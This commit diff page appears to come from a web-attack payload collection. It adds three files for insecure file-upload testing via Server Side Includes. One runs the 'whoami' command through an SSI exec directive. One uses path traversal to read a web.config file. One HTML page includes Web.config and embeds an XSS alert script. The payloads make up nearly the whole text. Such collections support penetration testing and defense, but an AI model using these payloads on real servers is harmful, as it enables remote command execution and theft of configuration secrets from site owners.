Deployed 3ca2ece with MkDocs version: 1.6.1
This commit is contained in:
1
Upload Insecure Files/Server Side Include/exec.shtml
Normal file
1
Upload Insecure Files/Server Side Include/exec.shtml
Normal file
@@ -0,0 +1 @@
|
||||
<!--#exec cmd="whoami" -->
|
||||
1
Upload Insecure Files/Server Side Include/include.shtml
Normal file
1
Upload Insecure Files/Server Side Include/include.shtml
Normal file
@@ -0,0 +1 @@
|
||||
<!--#include file="..\..\web.config" -->
|
||||
14
Upload Insecure Files/Server Side Include/index.stm
Normal file
14
Upload Insecure Files/Server Side Include/index.stm
Normal file
@@ -0,0 +1,14 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
|
||||
<head>
|
||||
<meta charset="utf-8" />
|
||||
<title></title>
|
||||
</head>
|
||||
|
||||
<body>
|
||||
<!-- #include file = "Web.config" -->
|
||||
<script>alert('XSS')</script>
|
||||
</body>
|
||||
|
||||
</html>
|
||||
Reference in New Issue
Block a user